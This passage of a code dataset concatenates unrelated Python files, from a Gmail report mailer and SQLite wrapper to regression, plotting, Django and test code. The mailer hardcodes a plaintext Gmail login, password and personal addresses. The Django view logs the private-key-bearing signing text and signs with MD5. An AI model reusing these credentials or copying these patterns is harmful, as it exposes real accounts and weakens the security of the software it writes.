check_glim(100001)\r\n\r\nme = \"pythonhmbr12@gmail.com\"\r\nyou = [\"asaddat87@gmail.com\",\"motiurhmbr@gmail.com\",\"Financehmbr2@gmail.com\"]\r\n\r\nmsg = MIMEMultipart('alternative')\r\nmsg['Subject'] = \"IM to GL check\"\r\nmsg['From'] = me\r\nmsg['To'] = \", \".join(you)\r\n\r\nHEADER = '''\r\n\r\n \r\n \r\n 
\r\n'''\r\nFOOTER = '''\r\n \r\n\r\n'''\r\nwith open('test.html','w') as f:\r\n f.write(HEADER)\r\n f.write('Trading Inventory Transactions')\r\n f.write(df_tranTrading.to_html())\r\n f.write('Trading GL Transactions')\r\n f.write(df_glimTrading.to_html())\r\n f.write('Karigor Inventory Transactions')\r\n f.write(df_tranKarigor.to_html())\r\n f.write('Karigor GL Transactions')\r\n f.write(df_glimKarigor.to_html())\r\n f.write(FOOTER)\r\n\r\nfilename = \"test.html\"\r\nf = open(filename)\r\nattachment = MIMEText(f.read(),'html')\r\nmsg.attach(attachment)\r\n\r\nusername = 'pythonhmbr12'\r\npassword = 'HMBR123321'\r\n\r\ns = smtplib.SMTP('smtp.gmail.com:587')\r\ns.starttls()\r\ns.login(username, password)\r\ns.sendmail(me,you,msg.as_string())\r\ns.quit()\r\n","sub_path":"gl_check_email.py","file_name":"gl_check_email.py","file_ext":"py","file_size_in_byte":5500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"30683924","text":"from pathlib import Path\r\nimport arrow\r\nimport apsw\r\nimport zlib\r\nfrom functools import lru_cache\r\nfrom common import *\r\nfrom config import get_config\r\n# https://stackoverflow.com/a/36730717\r\n\r\n\r\nclass Database:\r\n\r\n def __init__(self, db_path):\r\n self.db_path = db_path\r\n self.db = None\r\n\r\n def __enter__(self):\r\n self.open()\r\n return self\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self.close()\r\n\r\n def open(self):\r\n need_init = not Path(self.db_path).exists()\r\n self.db = apsw.Connection(self.db_path)\r\n if need_init:\r\n info('Creating a new DB at ' + self.db_path)\r\n self.init_database()\r\n\r\n def init_database(self):\r\n cursor = self.db.cursor()\r\n cursor.execute(\"CREATE VIRTUAL TABLE page_index USING fts4(title, body, tags, page_id);\")\r\n cursor.execute(\"\"\"CREATE TABLE resources (\r\n resource_id text primary key not null, \r\n original_name text,\r\n created_at timestamp not null,\r\n is_compressed integer not 
null,\r\n mimetype text,\r\n content blob not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE pages (\r\n page_id integer primary key not null, \r\n title text null,\r\n created_at timestamp not null,\r\n resource_id text,\r\n thumbnail blob);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE page_resource_map (\r\n page_resource_map_id integer primary key not null, \r\n page_id integer,\r\n resource_id text,\r\n UNIQUE (page_id, resource_id) ON CONFLICT REPLACE\r\n );\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE tags (\r\n tag_id integer primary key not null, \r\n name text not null);\"\"\")\r\n cursor.execute(\"\"\"CREATE TABLE page_tag_map (\r\n page_tag_map_id integer primary key not null, \r\n page_id integer,\r\n tag_id integer,\r\n UNIQUE (page_id, tag_id) ON CONFLICT REPLACE\r\n );\"\"\")\r\n\r\n @lru_cache(get_config().app.db_cache_max_size)\r\n def get_resource(self, resource_id: str):\r\n cursor = self.db.cursor()\r\n resource = cursor.execute(\"select resource_id, original_name, created_at, is_compressed, content, mimetype from resources where resource_id=?\", (resource_id, )) \\\r\n .fetchone()\r\n if not resource:\r\n return\r\n resource_id, original_name, created_at, is_compressed, content, mimetype = resource\r\n if is_compressed == 1:\r\n content = zlib.decompress(content)\r\n return original_name, arrow.get(created_at), content, mimetype\r\n\r\n def store_resource(self, resource_id, orignal_name, do_compression, content, mimetype):\r\n created_at = str(arrow.utcnow())\r\n is_compressed = 0\r\n if get_config().app.enable_compression and do_compression:\r\n content = zlib.compress(content)\r\n is_compressed = 1\r\n cursor = self.db.cursor()\r\n cursor.execute(\r\n \"insert into resources values (?,?,?,?,?,?)\",\r\n (resource_id, orignal_name, created_at, is_compressed, mimetype, content))\r\n\r\n def create_page(self, url):\r\n created_at = str(arrow.utcnow())\r\n cursor = self.db.cursor()\r\n new_id = cursor.execute(\r\n \"insert into pages (title, 
created_at) values (?, ?); select last_insert_rowid();\",\r\n (url, created_at)) \\\r\n .fetchone()[0]\r\n return new_id\r\n\r\n def update_page(self, page_id, resource_id, thumbnail):\r\n cursor = self.db.cursor()\r\n cursor.execute(\r\n \"update pages set thumbnail=?, resource_id=? where page_id=?\",\r\n (thumbnail, resource_id, page_id))\r\n\r\n def associate_page_resource(self, page_id, resource_id):\r\n cursor = self.db.cursor()\r\n cursor.execute(\r\n \"insert into page_resource_map (page_id, resource_id) values (?,?)\",\r\n (page_id, resource_id))\r\n\r\n def get_all_page_resources(self, page_id):\r\n cursor = self.db.cursor()\r\n data = cursor.execute(\"select resource_id from page_resource_map where page_id=?\", (page_id,)).fetchall()\r\n for res_id in data:\r\n name, time, content = self.get_resource(res_id[0])\r\n yield res_id[0], content, name\r\n\r\n def get_all_pages(self):\r\n cursor = self.db.cursor()\r\n data = cursor.execute(\"select * from pages\")\r\n yield from data\r\n\r\n def close(self):\r\n if self.db:\r\n self.db.close()\r\n","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":4932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565108364","text":"# https://towardsdatascience.com/machine-learning-polynomial-regression-with-python-5328e4e8a386\n# https://towardsdatascience.com/time-series-analysis-and-climate-change-7bb4371021e\n\n# Import the Pandas library\nimport pandas as pd\nimport numpy as np\n# Import Matplotlib\nimport matplotlib.pyplot as plt\nimport io, requests\nimport calendar\nfrom datetime import datetime\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split \nfrom sklearn.metrics import r2_score\nfrom sklearn.metrics import mean_squared_error\n\n# Fitting Linear Regression to the dataset\nfrom sklearn.preprocessing import PolynomialFeatures\nfrom sklearn.linear_model import 
LinearRegression\n\n# Function definition\ndef populate_df_with_anomolies_from_row(row):\n\tyear = row['Year']\n\t# Anomaly values (they seem to be a mixture of strings and floats)\n # data.iloc[,]\n\tmonthly_anomolies = row.iloc[1:]\n\t# Abbreviated month names (index names)\n\tmonths = monthly_anomolies.index\n\tfor month in monthly_anomolies.index:\n\t\t# Get the last day for each month \n\t\tlast_day = calendar.monthrange(year,datetime.strptime(month, '%b').month)[1]\n\t\t# construct the index with which we can reference our new DataFrame (to populate) \n\t\tdate_index = datetime.strptime(f'{year} {month} {last_day}', '%Y %b %d')\n\t\t# Populate / set value @ above index, to anomaly value\n\t\tt.loc[date_index] = monthly_anomolies[month]\n\t\t\ndef clean_anomaly_value(raw_value):\n\ttry:\n\t\treturn float(raw_value)\n\texcept:\n\t\treturn np.NaN\n\ndef viz_polymonial(X,y):\n plt.scatter(X, y, color='red')\n plt.plot(X, lin_reg.predict(poly_reg.fit_transform(X)), color='blue')\n plt.title('Climate (Polynomial Regression)')\n plt.xlabel('Date')\n plt.ylabel('Temperature')\n plt.show()\n return\n \ndef addTestValues(X, y):\n numero = len(X)\n ultimo = X[numero-1][0]\n result = np.arange('2021-01', '2040-12', dtype='datetime64[M]')\n contador = 0\n for i in result:\n if contador > 0:\n X_new = np.datetime64(i, 'D') - np.timedelta64(1, 'D')\n arrayX = np.array([X_new])\n X = np.append(X, arrayX).reshape(len(X)+1,1)\n y = np.append(y, np.empty([1,1], dtype=object)) \n contador = contador + 1\n viz_polymonial(X, y)\n\n \ndef getX(temp_X):\n result = []\n for i in temp_X:\n temp = []\n temp.append(i)\n result.append(temp)\n return result\n\n# Read in the raw temperature and emissions datasets (they are in CSV format)\nurl = 'https://data.giss.nasa.gov/gistemp/tabledata_v4/GLB.Ts+dSST.csv'\ns = requests.get(url).content\nraw_t = pd.read_csv(io.StringIO(s.decode('utf-8')), skiprows=1)\n#raw_t = pd.read_csv('./data/GLB.Ts+dSST.csv')\n\n# Create new dataframe with an index 
for each month\n# Last day of each month from 31/01/1880 to 31/12/2018\ndate_rng = pd.date_range(start='1/1/1880', end='1/03/2019', freq='M')\n\n# Next create the empty DataFrame, which we will populate using the actual data\n# each line contains an element of date_rng\n# index increment from 1\nt = pd.DataFrame(date_rng, columns=['date'])\n\n# Create a column for the anomoly values\n# index increment from 1\nt['Avg_Anomaly_deg_C'] = None\n\n# Set the index of the DataFrame to the date column (DateTime index)\nt.set_index('date', inplace=True)\n\n# data.iloc[,]\n#,:13 - da primeira a 13a coluna\n# https://www.shanelynn.ie/select-pandas-dataframe-rows-and-columns-using-iloc-loc-and-ix/\nraw_t = raw_t.iloc[:,:13]\n\n# Apply function to each row of raw data \n_ = raw_t.apply(lambda row: populate_df_with_anomolies_from_row(row), axis=1)\n\n# Apply above function to all anomaly values in DataFrame\nt['Avg_Anomaly_deg_C'] = t['Avg_Anomaly_deg_C'].apply(lambda raw_value: clean_anomaly_value(raw_value))\n\n# 'Forward fill' to take care of NaN values\nt.fillna(method='ffill', inplace=True)\n\ny=np.array(t['Avg_Anomaly_deg_C'].values, dtype=float)\ntemp=np.array(pd.to_datetime(t['Avg_Anomaly_deg_C'], format='%Y%m%d', errors='ignore').index.values)\ntempX = getX(list(temp))\nX=np.array(tempX)\n\npoly_reg = PolynomialFeatures(degree=3)\nX_poly = poly_reg.fit_transform(X)\nX_train, X_test, y_train, y_test = train_test_split(X_poly, y, random_state=0)\nlin_reg = LinearRegression().fit(X_train, y_train)\n\npred_train = lin_reg.predict(X_train)\npred_test = lin_reg.predict(X_test)\nprint('Root mean squared error (train): %.2f' % np.sqrt(mean_squared_error(y_train, pred_train)))\nprint('Coefficient of determination (train): %.2f (1 is perfect) ' % r2_score(y_train, pred_train))\nprint('Root mean squared error (test): %.2f' % np.sqrt(mean_squared_error(y_test, pred_test)))\nprint('Coefficient of determination (test): %.2f (1 is perfect) ' % r2_score(y_test, 
pred_test))\nprint('R-squared score (training): ', lin_reg.score(X_train, y_train))\nprint('R-squared score (test): ', lin_reg.score(X_test, y_test))\n\naddTestValues(X,y)","sub_path":"polynomialRegressionClimate.py","file_name":"polynomialRegressionClimate.py","file_ext":"py","file_size_in_byte":4905,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"402949530","text":"# encoding: utf-8\n'''\nCreated on 2015-01-08\n\n@author: xiaowei\n'''\nfrom adminapp.models import Agent\nfrom common.common import decrypt, json_response, \\\n set_request_notice, get_request_notice\nfrom conf import qingsong_conf as qs_conf\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.core.urlresolvers import resolve, Resolver404\nfrom titan.forms import BaseForm\nimport hashlib\nimport logging\nimport os\nimport re\n\n\ndef home(request):\n '''\n All request entry.\n '''\n params = getattr(request, request.method)\n form = BaseForm(params)\n if not form.is_valid():\n return qs_conf.RETURN_ARGUMENT_ERROR\n Access_Key = form.cleaned_data.get('Access_Key', '')\n Request_Key = form.cleaned_data.get('Request_Key', '')\n Request_Notice = form.cleaned_data.get('Request_Notice', '')\n action = form.cleaned_data.get('action', '')\n sign = form.cleaned_data.get('sign', '')\n\n # location the action function by url\n url = '/action/%s/' % action\n try:\n func, args, kwargs = resolve(url)\n except Resolver404:\n return qs_conf.RETURN_COMMAND_DOES_NOT_EXISTS\n\n agents = Agent.objects.filter(access_key=Access_Key)\n if not agents:\n return qs_conf.RETURN_AGENT_DOES_NOT_EXIST\n\n setattr(request, 'Access_Key', Access_Key)\n # add current agent attribute\n setattr(request, 'agent', agents[0])\n\n # check Request_Notice\n # get Request_Notice from memory, key is agent Access_Key\n last_request_notice, request_notice_dict = get_request_notice(\n request.Access_Key)\n if last_request_notice == Request_Notice:\n 
return qs_conf.REQUEST_REPEAT_ERROR\n # set Request_Notice to memory\n set_request_notice(\n request_notice_dict, {request.Access_Key: Request_Notice})\n\n # check sign\n logger = logging.getLogger(\"[VERIFY SIGN VALUE]\")\n formatter = logging.Formatter(\n '%(name)12s- %(asctime)s %(levelname)-8s %(message)s',\n '%a, %Y-%m-%d %H:%M:%S',)\n file_handler = logging.FileHandler(\n os.path.join(settings.BASE_DIR, \"logs/verify_sign_value.log\"))\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n logger.setLevel(logging.INFO)\n logger.info('#########################################')\n\n query_list = sorted(['%s=%s' % (k, v)\n for k, v in request.GET.iteritems() if k != 'sign'])\n text = '%s%s' % ('&'.join(query_list), request.agent.private_key)\n make_sign = hashlib.md5(text).hexdigest()\n\n logger.info('the text is %s' % text)\n logger.info('the sign is %s' % sign)\n logger.info('the make sign is %s' % make_sign)\n logger.info('#########################################')\n logger.removeHandler(file_handler)\n\n if make_sign != sign:\n return qs_conf.RETURN_SIGN_ERROR\n\n third_user_info = decrypt(\n Request_Key, request.agent.private_key).split(',')\n if not third_user_info[0].isdigit():\n return qs_conf.RETURN_USER_ID_ERROR\n # check third username format\n r = re.compile(\n \"^.+\\\\@(\\\\[?)[a-zA-Z0-9\\\\-\\\\.]+\\\\.([a-zA-Z]{2,3}|[0-9]{1,3})(\\\\]?)$\")\n if not r.match(third_user_info[1]):\n return qs_conf.RETURN_USERNAME_FORMAT_ERROR\n setattr(request, 'third_user_id', third_user_info[0])\n setattr(request, 'third_user_name', third_user_info[1])\n third_username = '%s_%s_%s' % (\n request.agent.id, request.third_user_id, request.third_user_name)\n third_user = User.objects.filter(agent_id=request.agent.id,\n username=third_username,\n third_user_id=request.third_user_id\n )\n\n if action != 'user_register' and not third_user:\n return qs_conf.RETURN_USER_DOES_NOT_EXIST\n if third_user:\n # add third user attribute\n setattr(request, 
'third_user', third_user[0])\n kwargs['request'] = request\n return_data = func(*args, **kwargs)\n return_data['action'] = action\n return json_response(return_data)\n","sub_path":"titan/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155265053","text":"import utils.utils as util\n\n\ndef translation(pixels, imgSize, x, y):\n pixels = util.convert_1d_to_2d(pixels, imgSize)\n height = imgSize[1]\n width = imgSize[0]\n new_pixels = [[0 for i in range(width)] for j in range(height)]\n for i in range(height):\n for j in range(width):\n if(i+y < height and j-x < width and i+y > 0 and j-x > 0):\n new_pixels[i][j] = pixels[i+y][j-x]\n return new_pixels\n","sub_path":"ops/translation.py","file_name":"translation.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"497627503","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Jul 27 12:29:44 2018\r\n\r\n@author: kramm\r\n\"\"\"\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport scipy\r\n\r\n\r\nL = 25\r\n\"\"\"PICK THESE VALUES\"\"\"\r\nresolution = 1000\r\nN = 10\r\n\"\"\"UP THERE\"\"\"\r\n\r\n\r\nx = np.linspace(-L,L, resolution)\r\n\r\ndef y_values(x_range):\r\n y = []\r\n for x in x_range:\r\n \"\"\"WRITE A FUNCTION HERE\"\"\"\r\n y.append(x)\r\n return y\r\n\r\n\r\ndata = y_values(x)\r\nplt.plot(x,data, color = 'r')\r\n\r\ndef an(data,n):\r\n b = [] \r\n x = [] \r\n for i in range(0,(len(data))):\r\n b.append(np.cos(np.pi * n *i / L))\r\n x.append(i)\r\n integrand = []\r\n\r\n for i in range(0,len(data)):\r\n c = data[i] * b[i]\r\n integrand.append(c)\r\n\r\n integration = scipy.integrate.simps(integrand,x, dx = 2*L/resolution) #spacing in x\r\n an = integration / len(integrand)\r\n #print (\"an\", an)\r\n return (an)\r\n\r\n\r\ndef bn(data,n):\r\n b = [] \r\n x = []\r\n 
for i in range(0,(len(data))):\r\n b.append(np.sin(np.pi * n *i / L))\r\n x.append(i)\r\n integrand = []\r\n \r\n for i in range(0,len(data)):\r\n c = data[i] * b[i]\r\n integrand.append(c)\r\n \r\n integration = scipy.integrate.simps(integrand,x, dx = 2*L/resolution)\r\n bn = integration / len(integrand)\r\n return (bn)\r\n \r\n\r\ndef fourier_coefficients(N):\r\n a = []\r\n for i in range(0,N):\r\n cn = an(data,i)\r\n a.append(cn)\r\n \r\n b = []\r\n for i in range(0,N):\r\n cn = bn(data, i)\r\n b.append(cn)\r\n \r\n alpha = []\r\n theta = []\r\n \r\n for i in range(0,len(a)):\r\n ALPHA = ((a[i])**2 +(b[i])**2)**0.5\r\n alpha.append(ALPHA)\r\n THETA = np.arctan(b[i]/a[i])\r\n theta.append(THETA)\r\n \r\n return a,b, alpha, theta\r\n\r\na,b,alpha, phi = fourier_coefficients(6)\r\n\r\ndef summation_trig(N,x_value,set_of_an, set_of_bn):\r\n\r\n y_value = []\r\n for i in range(0, N):\r\n y_value_intermediate = []\r\n y_value_intermediate.append(set_of_an[0][i] *np.cos(i*np.pi*x_value/L) + set_of_bn[0][i]*np.sin(i*np.pi*x_value/L))\r\n y_value_final = sum(y_value_intermediate)\r\n y_value.append(y_value_final)\r\n y_value = sum(y_value)\r\n return y_value\r\n\r\n\r\n\r\n\r\ndef plot(N,x):\r\n set_of_an = []\r\n set_of_bn = []\r\n set_of_alpha_n = []\r\n set_of_theta_n = []\r\n \r\n set_of_an.append(fourier_coefficients(N)[0])\r\n set_of_bn.append(fourier_coefficients(N)[1])\r\n set_of_alpha_n.append(fourier_coefficients(N)[2])\r\n set_of_theta_n.append(fourier_coefficients(N)[3])\r\n \r\n \r\n y = []\r\n for i in range(0, len(x)):\r\n y.append(summation_trig(N, x[i],set_of_an, set_of_bn))\r\n xa = []\r\n xb = []\r\n ya = []\r\n yb = []\r\n for i in range(0, len(x)/2):\r\n xa.append(x[i])\r\n yb.append(y[i])\r\n for i in range(len(x)/2 , len(x)):\r\n xb.append(x[i] -2*L/resolution)\r\n ya.append(y[i])\r\n \r\n \r\n fig_1 = plt.figure(1)\r\n fig_1.set_size_inches(7,3)\r\n plt.plot(xa,ya, color = 'b')\r\n plt.plot(xb,yb, color = 'b')\r\n #plt.plot(x,y)\r\n plt.xlim(-L, 
+L)\r\n \r\n \r\nplot(N,x)\r\n\r\n\r\n ","sub_path":"visuals_maths/Fourier/Mark/General_fourier_series.py","file_name":"General_fourier_series.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"33886031","text":"#!/usr/bin/env python\n\n\"\"\"This module display a histogram answering the next question:\nWhich Hogwarts course has a homogeneous score distribution between all four houses.\nRange is homogeneous since the coefficient of variation is less than 0.33.\"\"\"\n\nfrom os import path\nfrom pickle import load\nfrom collections import defaultdict\nfrom math import sqrt\nfrom matplotlib import pyplot\nfrom sys import argv\nimport seaborn\n\ndef read_data(name):\n \"\"\"Read a pickled representation of dict obj from the file.\"\"\"\n\n try:\n p = path.join(path.dirname(path.abspath(__file__)), name)\n f = open(p, 'r')\n d = load(f)\n f.close\n return d\n except Exception as e:\n print('histogram.read_data: %s' % str(e))\n exit(1)\n\ndef homogeneous(stat, content):\n \"\"\"Keep stat and content data and calculate homogeneous for courses\n Draw histograms unsing calculated data.\"\"\"\n\n try:\n for course in stat.keys():\n houses = defaultdict(list)\n score = content[course]\n names = content['Hogwarts House']\n homogeneous = True\n\n i = 0\n while i < len(score):\n if score[i] is not '' and names[i] is not '':\n houses[names[i]].append(score[i])\n i += 1\n\n if not houses:\n homogeneous = False\n\n for key in houses.keys():\n houses[key] = [float(i) for i in houses[key] if i is not '']\n mean = 0\n std = 0\n\n for val in houses[key]:\n mean += val / len(houses[key])\n for val in houses[key]:\n std += ((val - mean) ** 2) / len(houses[key])\n std = sqrt(std)\n coef = abs(std / mean)\n if coef > 0.33:\n homogeneous = False\n\n if homogeneous == True:\n seaborn.set(color_codes=True)\n pyplot.subplots(figsize=(10, 10))\n pyplot.title(course)\n for name, values in 
houses.items():\n seaborn.distplot(values, label=name);\n pyplot.legend()\n pyplot.show()\n except Exception as e:\n print('homogeneous.read_data: %s' % str(e))\n exit(2)\n\ndef main():\n \"\"\"Usage: histogram.py\"\"\"\n \n if len(argv) == 1:\n content = read_data('.content')\n stat = read_data('.stat')\n\n homogeneous(stat, content)\n else:\n print(main.__doc__)\n exit(1)\n\nif __name__ == '__main__':\n main()\n","sub_path":"histogram.py","file_name":"histogram.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"65422549","text":"#!/usr/bin/python\n# Copyright (c) 2017 Dell Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n#\n# THIS CODE IS PROVIDED ON AN *AS IS* BASIS, WITHOUT WARRANTIES OR\n# CONDITIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT\n# LIMITATION ANY IMPLIED WARRANTIES OR CONDITIONS OF TITLE, FITNESS\n# FOR A PARTICULAR PURPOSE, MERCHANTABLITY OR NON-INFRINGEMENT.\n#\n# See the Apache Version 2.0 License for specific language governing\n# permissions and limitations under the License.\n\n\"\"\"Module for creation and caching of the VLAN SubInterface specific config objects\"\"\"\n\nimport nas_os_if_utils as nas_if\nimport copy\n\n\nclass VLAN_SUBINTF(object):\n \"\"\"VLAN SUBINTF config object class\"\"\"\n def __init__(self, parent_intf, vlan_id):\n \"\"\"Constructor\"\"\"\n self.parent_intf = parent_intf\n self.vlan_id = vlan_id\n self.name = str(parent_intf) + '.' 
+ str(vlan_id)\n\n\n\"\"\"VLAN SubInterface Object Cache\"\"\"\nVLAN_SUBINTF_MAP = {}\n\ndef cache_get(name):\n \"\"\"Method to get a VLAN SUBINTF configuration object from cache\"\"\"\n if name in VLAN_SUBINTF_MAP:\n return VLAN_SUBINTF_MAP[name]\n return None\n\ndef cache_del(name):\n \"\"\"Method to delete a VLAN SUBINTF configuration object from cache\"\"\"\n if name in VLAN_SUBINTF_MAP:\n del VLAN_SUBINTF_MAP[name]\n return True\n return False\n\ndef cache_update(name, config_obj):\n \"\"\"Method to update a VLAN SUBINTF configuration object in the cache\"\"\"\n cache_del(name)\n return cache_add(name, config_obj)\n\ndef cache_add(name, config_obj):\n \"\"\"Method to add a VLAN SUBINTF configuration object to the cache\"\"\"\n if name not in VLAN_SUBINTF_MAP:\n VLAN_SUBINTF_MAP[name] = config_obj\n return True\n return False\n\n\n\"\"\"VLAN SUBINTF object related attributes\"\"\"\nVLAN_PARENT_INTF_NAME = 'dell-if/if/interfaces/interface/parent-interface'\nVLAN_SUBINTF_VLAN_ID = 'dell-if/if/interfaces/interface/vlan-id'\n\ndef __read_attr(cps_obj, attr_id):\n \"\"\"Method to read a CPS attribute value from the CPS object\"\"\"\n val = None\n try:\n val = cps_obj.get_attr_data(attr_id)\n nas_if.log_info(\"Value of CPS attr %s is %s: \" % \\\n (str(attr_id), str(val)))\n except ValueError:\n nas_if.log_err(\"Failed to read value of the CPS attr %s\" % str(attr_id))\n return val\n\ndef create(cps_obj):\n \"\"\"Method to convert the CPS object into a VLAN SUBINTF configuration object\"\"\"\n\n parent_intf = __read_attr(cps_obj, VLAN_PARENT_INTF_NAME)\n if parent_intf is None:\n return None\n\n cfg_obj = copy.deepcopy(cache_get(parent_intf))\n\n if cfg_obj is None:\n vlan_id = __read_attr(cps_obj, VLAN_SUBINTF_VLAN_ID)\n if vlan_id is None:\n return None\n cfg_obj = VLAN_SUBINTF(parent_intf, vlan_id)\n\n return 
cfg_obj\n","sub_path":"scripts/lib/python/nas_vlan_subintf_config_obj.py","file_name":"nas_vlan_subintf_config_obj.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"588706973","text":"# -*- mode: python -*-\na = Analysis(['T-Rax.py'],\n pathex=['Z:\\Documents\\Programming\\Large Projects\\Spectrometer Stuff\\T-Rax'],\n hiddenimports=[],\n hookspath=None,\n runtime_hooks=None)\npyz = PYZ(a.pure)\nexe = EXE(pyz,\n a.scripts,\n exclude_binaries=True,\n name='T-Rax.exe',\n debug=False,\n strip=None,\n upx=True,\n console=False)\ncoll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=None,\n upx=True,\n name='T-Rax')\n","sub_path":"T-Rax.spec","file_name":"T-Rax.spec","file_ext":"spec","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"530946313","text":"import os\nimport subprocess\nimport shutil\nimport pandas as pd\nfrom threading import Timer\n\n\ndef cleanup():\n if \"fort.58\" in os.listdir(os.getcwd()):\n os.remove(\"fort.58\")\n if \"fort.59\" in os.listdir(os.getcwd()):\n os.remove(\"fort.59\")\n if \"fort.66\" in os.listdir(os.getcwd()):\n os.remove(\"fort.66\")\n if \"control\" in os.listdir(os.getcwd()):\n os.remove(\"control\")\n\n\nif __name__ == \"__main__\":\n\n dirname = None\n print(\"\\n\\n\\nWhat do you want this run to be called?\")\n runname = raw_input(\">>> \")\n\n if os.path.exists(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname)):\n shutil.rmtree(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname))\n os.mkdir(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname))\n\n print(\"What is the directory name where input directories are located?\")\n while True:\n inp = raw_input(\">>> \")\n if os.path.exists(os.getcwd() + \"/\" + inp):\n dirname = inp\n print(\"Found directory: \" + os.getcwd() + \"/\" + dirname)\n break\n else:\n 
print(os.getcwd() + \"/\" + inp + \" not found!\")\n for root, dirs, files in os.walk(os.getcwd() + \"/\" + dirname, topdown=False):\n for dir in dirs:\n os.mkdir(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir)\n os.mkdir(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.58\")\n os.mkdir(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.59\")\n os.mkdir(os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.66\")\n\n for rs, ss, fs in os.walk(os.getcwd() + \"/\" + dirname + \"/\" + dir):\n for f in fs:\n component = None\n if \"BSP\" in f:\n component = \"BSP\"\n elif \"MORB\" in f:\n component = \"MORB\"\n cleanup()\n shutil.copy(os.getcwd() + \"/\" + dirname + \"/\" + dir + \"/\" + f, os.getcwd() + \"/\" + \"control\")\n starcomponent = f.replace(\"HeFESTo_Infile.txt\", \"\").replace(\"HeFESTo_Infile.txt\", \"\")\n p = subprocess.Popen(os.getcwd() + \"/main\", stdin=None, stdout=None)\n t = Timer(800, p.kill)\n t.start()\n p.communicate()\n t.cancel()\n if \"fort.58\" in os.listdir(os.getcwd()):\n shutil.move(os.getcwd() + \"/fort.58\",\n os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.58/\" + \"{}.txt\".format(\n starcomponent + \"HeFESTo_Output_File\"))\n if \"fort.59\" in os.listdir(os.getcwd()):\n shutil.move(os.getcwd() + \"/fort.59\",\n os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.59/\" + \"{}.txt\".format(\n starcomponent + \"HeFESTo_Output_File\"))\n if \"fort.66\" in os.listdir(os.getcwd()):\n shutil.move(os.getcwd() + \"/fort.66\",\n os.getcwd() + \"/{}_HeFESTo_Output_Files/\".format(runname) + dir + \"/fort.66/\" + \"{}.txt\".format(\n starcomponent + \"HeFESTo_Output_File\"))\n\n","sub_path":"old/runhefesto.py","file_name":"runhefesto.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"378388592","text":"import csv\n\ndata_path =\"./survey.csv\"\n\ndef run_main():\n\n male_set = {\"male\", 'm'}\n female_set = {'female', 'f'}\n\n result_dict = {}\n\n with open(data_path,'r', newline='') as csvfile:\n rows = csv.reader(csvfile)\n\n for i, row in enumerate(rows):\n if i == 0:\n continue\n if i % 50 == 0:\n print(\"正在加载{}数据.....\".format(i))\n\n # 性别属性\n gender_var = row[2]\n contry_var = row[3]\n\n gender_var = gender_var.replace(\" \", \"\")\n gender_var = gender_var.lower()\n\n # 判断国家是否存在\n if contry_var not in result_dict:\n result_dict[contry_var] = [0, 0]\n if gender_var in female_set:\n result_dict[contry_var][0] += 1\n elif gender_var in male_set:\n result_dict[contry_var][1] += 1\n else:\n pass\n with open('gender_country.csv','w', newline=\"\", encoding='utf-16') as csvfile:\n csvwriter = csv.writer(csvfile)\n csvwriter.writerow([\"国家\", \"女\", \"男\"])\n\n for k, v in list(result_dict.items()):\n csvwriter.writerow([k, v[0], v[1]])\n\n\n\n\n\n\n\n\n\n\n\n\n\nif __name__ == '__main__':\n\n run_main()\n","sub_path":"mental/mental.py","file_name":"mental.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"474315025","text":"from hstest.check_result import correct\nfrom hstest.dynamic.dynamic_test import dynamic_test\nfrom hstest.dynamic.output.infinite_loop_detector import loop_detector\nfrom hstest.testing.tested_program import TestedProgram\nfrom hstest.testing.unittest.user_error_test import UserErrorTest\n\n\nclass InfiniteLoopTestChar(UserErrorTest):\n contain = \"\"\"\n Error in test #1\n\n Infinite loop detected.\n No input request for the last 5000 characters being printed.\n 